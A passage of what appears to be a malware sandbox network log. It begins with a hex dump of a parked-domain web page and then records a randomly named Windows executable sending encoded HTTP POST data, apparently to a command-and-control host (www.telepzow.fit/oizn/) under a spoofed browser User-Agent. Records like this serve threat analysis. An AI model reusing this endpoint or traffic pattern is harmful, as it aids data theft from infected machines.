                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                      Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                      Dec 13, 2024 13:18:37.445369005 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                      Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                      Dec 13, 2024 13:18:37.445426941 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                      Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                      Dec 13, 2024 13:18:37.445461988 CET1236INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                      Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                      Dec 13, 2024 13:18:37.445497990 CET1236INData Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61
                                                      Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
                                                      Dec 13, 2024 13:18:37.445530891 CET1236INData Raw: 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3e 42 75 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73
                                                      Data Ascii: s=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hosti
                                                      Dec 13, 2024 13:18:37.445569038 CET1236INData Raw: 64 65 41 74 28 74 2b 2b 29 29 29 29 7b 69 66 28 65 3d 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 2b 29 2c 35 35 32 39 36 21 3d 28 36 34 35 31 32 26 72 29 7c 7c 35 36 33 32 30 21 3d 28 36 34 35 31 32 26 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52
                                                      Data Ascii: deAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){i
                                                      Dec 13, 2024 13:18:37.445602894 CET1236INData Raw: 70 2c 73 3c 28 43 3d 67 3c 3d 69 3f 31 3a 69 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 69 29 29 62 72 65 61 6b 3b 69 66 28 70 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 28 6f 2d 43 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e
                                                      Data Ascii: p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.
                                                      Dec 13, 2024 13:18:37.445640087 CET424INData Raw: 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 29 7b 76 61 72 20 74 3d 72 5b 6e 5d 3b 65 2e 70 75 73 68 28 74 2e 6d 61 74 63 68 28 2f 5b 5e 41 2d 5a 61 2d 7a 30 2d 39 2d 5d 2f 29 3f 22 78
                                                      Data Ascii: .split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?puny


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.2449789172.67.155.214806880C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 13:18:43.127372026 CET710OUTPOST /oizn/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 204
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.telepzow.fit
                                                      Origin: http://www.telepzow.fit
                                                      Referer: http://www.telepzow.fit/oizn/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 6a 53 4c 4c 7a 55 6f 31 4e 74 6b 6f 35 2f 68 75 43 4f 67 64 63 42 6c 71 53 4f 49 78 6d 75 4b 38 59 63 4e 6b 55 4b 7a 55 6f 4b 6b 45 51 68 73 7a 41 76 76 47 45 31 63 57 52 6d 47 77 4e 72 4e 43 2b 74 78 6a 35 71 4b 72 64 63 69 6c 49 48 68 44 45 6c 65 65 54 41 59 4b 72 57 4c 43 4e 47 71 70 74 5a 7a 44 44 51 72 55 34 44 4b 4e 33 44 5a 4d 70 6f 6b 49 49 6c 61 73 51 49 4d 38 6b 36 68 43 70 38 52 51 4b 31 47 48 48 46 48 58 30 44 64 51 58 4e 73 52 53 4d 71 76 44 65 75 78 2f 79 6e 4c 52 75 75 71 52 76 62 42 75 75 70 50 36 56 34 51 45 70 76 36 61 48 35 53 6d 61 55 39 6d 56 47 7a 4c 67 3d 3d
                                                      Data Ascii: BTV4RR_=jSLLzUo1Ntko5/huCOgdcBlqSOIxmuK8YcNkUKzUoKkEQhszAvvGE1cWRmGwNrNC+txj5qKrdcilIHhDEleeTAYKrWLCNGqptZzDDQrU4DKN3DZMpokIIlasQIM8k6hCp8RQK1GHHFHX0DdQXNsRSMqvDeux/ynLRuuqRvbBuupP6V4QEpv6aH5SmaU9mVGzLg==
                                                      Dec 13, 2024 13:18:44.714015961 CET917INHTTP/1.1 404 Not Found
                                                      Date: Fri, 13 Dec 2024 12:18:44 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7eAqeDgL%2B9IYgjwd35JsDeYRc520WXQ1tG0wOTC7AGli1LT4S6mCK7I3oeZyj%2FOYoIa8UazPBsoC1bJHcaux1YI4dkx3aeaByHXc2FnM2BZLEekPa%2FXJN8jwM82UgjRvx1pK"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8f15e6013cb98cbf-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1989&min_rtt=1989&rtt_var=994&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=710&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46 c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.2449790172.67.155.214806880C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 13:18:45.816857100 CET1082OUTPOST /oizn/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 576
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.telepzow.fit
                                                      Origin: http://www.telepzow.fit
                                                      Referer: http://www.telepzow.fit/oizn/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 6a 53 4c 4c 7a 55 6f 31 4e 74 6b 6f 35 62 6c 75 41 76 67 64 4c 52 6b 59 4f 65 49 78 76 4f 4b 47 59 63 42 6b 55 4c 48 36 72 38 55 45 51 44 6b 7a 42 72 37 47 48 31 63 57 65 47 47 70 4a 72 4e 4a 2b 74 38 63 35 72 47 72 64 63 32 6c 4a 31 70 44 46 46 65 42 4c 41 59 50 73 57 4c 4a 43 6d 72 35 74 5a 7a 62 44 51 71 50 34 41 65 4e 32 48 56 4d 6a 35 6b 49 49 6c 61 71 5a 6f 4d 6a 67 36 67 71 70 38 5a 79 4b 78 75 74 48 47 54 58 31 67 56 51 48 4e 73 57 46 38 71 6a 4c 2b 76 68 37 41 72 41 52 4d 65 30 4c 2b 76 4a 72 74 56 69 6d 6d 51 47 4d 4c 33 55 57 33 34 6f 68 4e 4a 36 71 58 44 33 65 34 35 4a 54 2b 76 67 2b 55 69 6f 6d 33 78 67 34 34 61 57 75 58 32 4a 4c 30 7a 4b 4f 35 74 52 65 41 6a 32 68 38 65 79 68 79 30 6a 42 52 55 68 58 59 4a 51 47 44 36 45 42 53 46 67 4b 62 61 66 6f 79 45 77 78 44 4f 76 79 75 74 52 77 6b 42 52 50 56 43 54 42 70 79 35 39 47 4a 37 4f 48 63 73 44 50 2f 48 6e 51 78 33 56 79 77 77 54 74 57 5a 6f 6c 55 45 64 78 76 6d 69 64 39 50 2f 32 57 32 78 73 75 38 61 79 31 52 56 61 [TRUNCATED]
                                                      Data Ascii: BTV4RR_=jSLLzUo1Ntko5bluAvgdLRkYOeIxvOKGYcBkULH6r8UEQDkzBr7GH1cWeGGpJrNJ+t8c5rGrdc2lJ1pDFFeBLAYPsWLJCmr5tZzbDQqP4AeN2HVMj5kIIlaqZoMjg6gqp8ZyKxutHGTX1gVQHNsWF8qjL+vh7ArARMe0L+vJrtVimmQGML3UW34ohNJ6qXD3e45JT+vg+Uiom3xg44aWuX2JL0zKO5tReAj2h8eyhy0jBRUhXYJQGD6EBSFgKbafoyEwxDOvyutRwkBRPVCTBpy59GJ7OHcsDP/HnQx3VywwTtWZolUEdxvmid9P/2W2xsu8ay1RValC0PLr21+cjb8EUS1phlRuJuIIUeOvlvw5cdSVlX1ljAsRMzmLQC95Uzbysjrp5C9Pzvm6+qhpNCwA90XY7K5xmvXZIKpFGAbaqwrYxYpw5P5e4jl6WV1D7G4m6hNWq738K/4hqkyXO3UP7OpAppg7asF3IFs2NjGaLAX5kQ3zugdtaM1pUjPPr9QO0c1SqB0K290mbb8mSuisYDsjaRb/K6cFzwzBgfcwy67+pJEIwwE=
                                                      Dec 13, 2024 13:18:47.379065037 CET924INHTTP/1.1 404 Not Found
                                                      Date: Fri, 13 Dec 2024 12:18:47 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qO%2BuBPeVrnha5YOePar4qkMlRazE%2BXp%2F%2FKUpLFZs6hYDmoEXNviCHd7y%2F7zBRgCf4V4OOhmThyA6tJT96Xy7mqk%2FXE9UpF0MmWEvj7x5H7Efgv0zB3jaVpTR3dOy6QLVxLdu"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8f15e611efe0de99-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1541&min_rtt=1541&rtt_var=770&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=1082&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46 c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.2449791172.67.155.214806880C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 13:18:48.484707117 CET12360OUTPOST /oizn/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Content-Length: 45184
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Host: www.telepzow.fit
                                                      Origin: http://www.telepzow.fit
                                                      Referer: http://www.telepzow.fit/oizn/
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                      Data Raw: 42 54 56 34 52 52 5f 3d 6a 53 4c 4c 7a 55 6f 31 4e 74 6b 6f 35 62 6c 75 41 76 67 64 4c 52 6b 59 4f 65 49 78 76 4f 4b 47 59 63 42 6b 55 4c 48 36 72 38 63 45 51 57 77 7a 41 4a 54 47 47 31 63 57 41 57 47 30 4a 72 4e 59 2b 74 6b 59 35 72 36 37 64 65 4f 6c 4b 6d 78 44 47 6e 32 42 63 51 59 4d 76 57 4c 44 4e 47 72 39 74 5a 6a 48 44 51 2f 79 34 44 53 4e 33 31 4e 4d 75 59 6b 4c 4e 6c 61 73 51 49 4d 6f 6b 36 67 32 70 38 4a 32 4b 78 53 74 45 33 76 58 31 69 39 51 48 61 77 57 46 63 71 6a 4e 2b 75 6a 31 51 6d 6d 52 4d 65 34 4c 2b 36 53 72 66 64 69 6c 55 49 47 4d 62 33 62 61 6e 34 69 76 74 4a 34 75 58 43 39 65 34 78 4a 54 2f 66 67 2b 45 61 6f 67 55 31 67 34 59 61 56 6e 33 32 4a 66 6b 7a 45 51 4a 70 77 65 41 6a 68 68 34 6d 49 68 79 67 6a 44 31 41 68 53 71 78 54 41 6a 36 44 43 53 46 36 56 72 61 43 6f 79 41 57 78 41 2b 76 31 65 78 52 77 55 52 52 65 6d 71 53 48 35 79 2b 72 32 4a 6c 42 6e 42 36 44 50 6e 44 6e 52 52 6e 56 69 51 77 54 74 6d 5a 73 6d 4d 45 56 68 76 6d 6b 64 38 4b 79 57 58 64 78 73 75 38 61 78 52 52 56 71 [TRUNCATED]
                                                      Data Ascii: BTV4RR_=jSLLzUo1Ntko5bluAvgdLRkYOeIxvOKGYcBkULH6r8cEQWwzAJTGG1cWAWG0JrNY+tkY5r67deOlKmxDGn2BcQYMvWLDNGr9tZjHDQ/y4DSN31NMuYkLNlasQIMok6g2p8J2KxStE3vX1i9QHawWFcqjN+uj1QmmRMe4L+6SrfdilUIGMb3ban4ivtJ4uXC9e4xJT/fg+EaogU1g4YaVn32JfkzEQJpweAjhh4mIhygjD1AhSqxTAj6DCSF6VraCoyAWxA+v1exRwURRemqSH5y+r2JlBnB6DPnDnRRnViQwTtmZsmMEVhvmkd8KyWXdxsu8axRRVqZC1dzr+GGfnr8GRS0shlcwJqRIUb70lec5cvqVuFt6kAsWIznJUCxGUz3Ysi3p5zRPhOm67d1qbSwc0UW10q5DmvDJILN/F0TaqxbYxYpw5P5Y7jl+WV1H7G466lpoq/j8K8QhqnaUPXUK3upKnJgwasdVIEcmN0aaXiv5hQ38wAdpaM10JzPmr9kG0flCqwUK2+smOfgSMsjOFQcWKTzTP9F96jX/peQftt+stcQ9tVyGMK1419i/HGG2EOxjl/epoHGEB3Us25M5AHFietmP/KREIgwyBtGeQgyZoHcPSjBv4VI3+TRsZ3h48llcObVUCVSY1Bf3DaWYtL4wjQjGe3YgbhJmEtRfcDWEuPYInvfZspgHITFuhq1O8DqmPM4ZZBwd8WzY9DYL/8lo/kmNsLqfJlcNMuBXgT6VbrSWKzVd0c8e4EpNR+ugz+Cq0V0/i0FOS0/tIFjU5Udko9JmFrndysLcPnhEL8vLtO2WQsgWxoTVelZk1n7W2BR262i5y55hpiLcSD72EDh5Q8NzU0sVcOIwsKmlvdefG6L2mL0EFD+vqhcDrYiv+Rlhl5qtq7PYqxkufmqwTWkdjsZh1wm4O882kEvTcaI5p2o96sxXC9+fQW3ZBUf1xR1wMFF8rqOhRp5puHVia6P1tznCVwzOIf1Eu/Oa [TRUNCATED]
                                                      Dec 13, 2024 13:18:48.604996920 CET2472OUTData Raw: 32 56 46 32 4f 39 34 75 41 39 43 63 51 59 43 2b 6b 47 70 4b 71 57 41 39 73 6c 59 36 79 74 51 51 6c 43 6b 79 62 71 79 4c 6d 2f 37 76 65 71 74 7a 37 72 66 75 6f 38 33 49 4d 36 42 42 56 46 2b 77 53 44 72 6d 74 65 31 56 6e 63 52 34 54 58 32 41 62 79
                                                      Data Ascii: 2VF2O94uA9CcQYC+kGpKqWA9slY6ytQQlCkybqyLm/7veqtz7rfuo83IM6BBVF+wSDrmte1VncR4TX2AbyEfG+VeYhirvMcgEJ1gEExjB317tMQ8K5p41pf8ilZynIT+omuD89sBaVjXZi7VaAixvvfiIaRj1jPjKkCT4UABCuVRHFha5wuzB3kOKq3HP+11DiNYDVirOAFfm81LnK7b9k/5bZ48oBzhNt26xmNuflmI2NJDV7V
                                                      Dec 13, 2024 13:18:48.605077028 CET7416OUTData Raw: 35 36 4d 47 53 4b 39 47 31 5a 4a 4c 63 38 4c 58 77 43 70 46 66 38 37 42 65 35 6f 47 67 43 55 4a 51 5a 55 46 61 37 64 77 68 30 52 63 36 33 71 77 38 63 31 4d 7a 4c 31 6d 42 4f 4e 30 74 59 59 53 64 63 74 65 45 55 6c 58 74 53 43 44 47 4e 38 6a 6f 74
                                                      Data Ascii: 56MGSK9G1ZJLc8LXwCpFf87Be5oGgCUJQZUFa7dwh0Rc63qw8c1MzL1mBON0tYYSdcteEUlXtSCDGN8jotXoomYsUeJOOOWi4j+h4rOKPMgLqPMDXmC3UV9Ba9mgAhlRDevUEUN3gthjLq8B0fOQlkj//5EV7DCi2ElixsrE7AqmjLLwEW5SqaflXcFmpHbLK/XcGAlo0CQkINcvh6SIqC1K77p8eUWCAVQTRVepKrz58T9xCN7
                                                      Dec 13, 2024 13:18:48.605110884 CET2472OUTData Raw: 4c 42 63 71 65 50 67 6d 43 2b 6d 68 65 31 39 71 36 56 30 54 58 65 75 72 4b 31 37 6c 58 66 79 70 72 69 56 74 56 34 44 76 2f 6d 46 79 53 6c 74 54 39 42 43 46 32 34 6d 33 57 6b 56 52 66 72 31 51 4c 31 52 31 48 4c 65 56 72 4c 30 30 4a 78 6d 34 50 2f
                                                      Data Ascii: LBcqePgmC+mhe19q6V0TXeurK17lXfypriVtV4Dv/mFySltT9BCF24m3WkVRfr1QL1R1HLeVrL00Jxm4P/YuRrkCAXtecisWopVk8bN2+ccpaRCzvr4HV2bdx21vPsxmziKpxPB5uvW5W30r8y8kQQkvHzcP01vqXJ033JOJpKv3n32LCKGUIC5gzSPpv0Sh+jhfD6fA41Bh1UzIO2Ml0CHQLOgAgb+PTCbimm9mxpalbv/DOZu
                                                      Dec 13, 2024 13:18:48.605125904 CET2472OUTData Raw: 2f 2f 76 32 65 56 36 34 36 32 71 7a 77 49 6e 70 43 68 58 76 39 63 61 66 6c 73 68 2f 46 4f 55 42 62 41 70 74 68 50 44 56 37 35 79 70 6c 78 35 53 68 79 38 33 57 6c 76 59 36 67 2b 70 64 47 47 36 2b 41 59 42 4d 37 49 79 45 31 57 7a 62 37 46 34 62 68
                                                      Data Ascii: //v2eV6462qzwInpChXv9caflsh/FOUBbApthPDV75yplx5Shy83WlvY6g+pdGG6+AYBM7IyE1Wzb7F4bhasMz1W+u/DBGjAaBUneaipD6fsHnOb9zcwPaG+IO0+f/4EghyOUCBx73Yg2MMwcAlEBtddzqxK7xDtWSVjNpAjx+Neytm9oKjcDP4lP1XWsat1taKp6gGKu/FadaqlOvG2pBRMUabkMyE0aGxn+aHPmx5tdAzmy/S
                                                      Dec 13, 2024 13:18:48.605155945 CET2472OUTData Raw: 35 36 61 79 4c 47 43 38 6d 58 4e 55 43 34 63 35 4e 30 42 41 43 77 50 4b 75 49 68 4c 4c 62 66 66 66 74 6a 35 79 56 42 72 5a 73 2f 42 76 30 41 48 66 50 4a 33 49 49 36 46 61 44 49 70 6d 2b 6d 34 73 63 63 54 4b 37 4e 79 6f 46 30 42 66 32 47 65 43 7a
                                                      Data Ascii: 56ayLGC8mXNUC4c5N0BACwPKuIhLLbffftj5yVBrZs/Bv0AHfPJ3II6FaDIpm+m4sccTK7NyoF0Bf2GeCzxUZBBOxUoIdiECrUzX5HZJS6ouTQtoV8EW7bkOEuWRGuEsVqcGO/Sf5eo0Ojt9lEwSEMG/2Z78CjzLMHqMw61j1s9xC5tl0sS/F5E08/hE5yXXBRXgiqpTtFQkDNaxWhJogSaY9/dIOfjPfqvb3PKB5BFchQQHKoC
                                                      Dec 13, 2024 13:18:48.605221987 CET2472OUTData Raw: 5a 39 38 73 61 55 33 38 59 78 36 5a 49 42 73 42 76 41 46 4e 51 37 78 61 54 4b 63 72 58 58 78 31 61 35 59 77 57 47 67 39 64 70 75 6e 6e 6b 62 79 64 2f 58 65 53 4c 4a 51 59 4c 61 76 34 46 45 4e 78 4d 4a 6e 35 71 36 77 33 39 32 57 64 47 6b 54 77 4e
                                                      Data Ascii: Z98saU38Yx6ZIBsBvAFNQ7xaTKcrXXx1a5YwWGg9dpunnkbyd/XeSLJQYLav4FENxMJn5q6w392WdGkTwNxUkDqyCR5eoWwgpqQ+pVKm4waKYByk3TWodMxR5CB9gZHD7UFAiVFVREvy+WtUJhICV2bmB6QvH3N7Tn88cs0bX6HgYZzLQxZMUZHAuBiaaRBT9JWx6A2UIMxvVxAusaVSaZ9elZrV238ICS9c+m+iTJudCHr2QC1
                                                      Dec 13, 2024 13:18:48.605237007 CET2472OUTData Raw: 4c 30 48 42 2f 63 6a 6f 2b 55 6c 65 35 79 46 62 4a 6c 41 6b 30 68 57 4b 56 2b 34 4a 33 65 66 6b 5a 30 73 78 47 48 75 35 76 69 6d 64 30 4d 49 67 4d 76 4e 73 59 65 31 37 44 4d 41 4f 44 57 57 37 73 74 52 55 47 7a 41 30 41 42 53 2b 69 73 57 45 65 31
                                                      Data Ascii: L0HB/cjo+Ule5yFbJlAk0hWKV+4J3efkZ0sxGHu5vimd0MIgMvNsYe17DMAODWW7stRUGzA0ABS+isWEe1W4PPazkQ00TmYjs8aVbR/IlV8Wc6qAIgiJMH+9Cj6HRHvf58XchK8awprovC4psFt9gvPr6z+Z3MuqE4HOTYhc9w9D6aE9Im5J8hfa0hcRB/od5I0BjS/HkFOj1+Ie65HpCn4UhmgeA1OwEA/mA8LNSgCWdzkL/CS
                                                      Dec 13, 2024 13:18:48.605261087 CET2472OUTData Raw: 36 41 33 52 6b 2f 4d 35 35 46 69 78 76 74 67 31 77 4d 4e 57 66 35 4b 63 64 57 70 33 59 74 79 74 37 6b 58 4e 70 50 4a 37 43 38 35 48 51 52 55 31 30 51 2f 51 4a 4a 73 39 53 4f 65 72 48 6c 70 71 54 4c 55 63 48 2f 38 6e 73 77 59 4f 72 4b 38 77 50 30
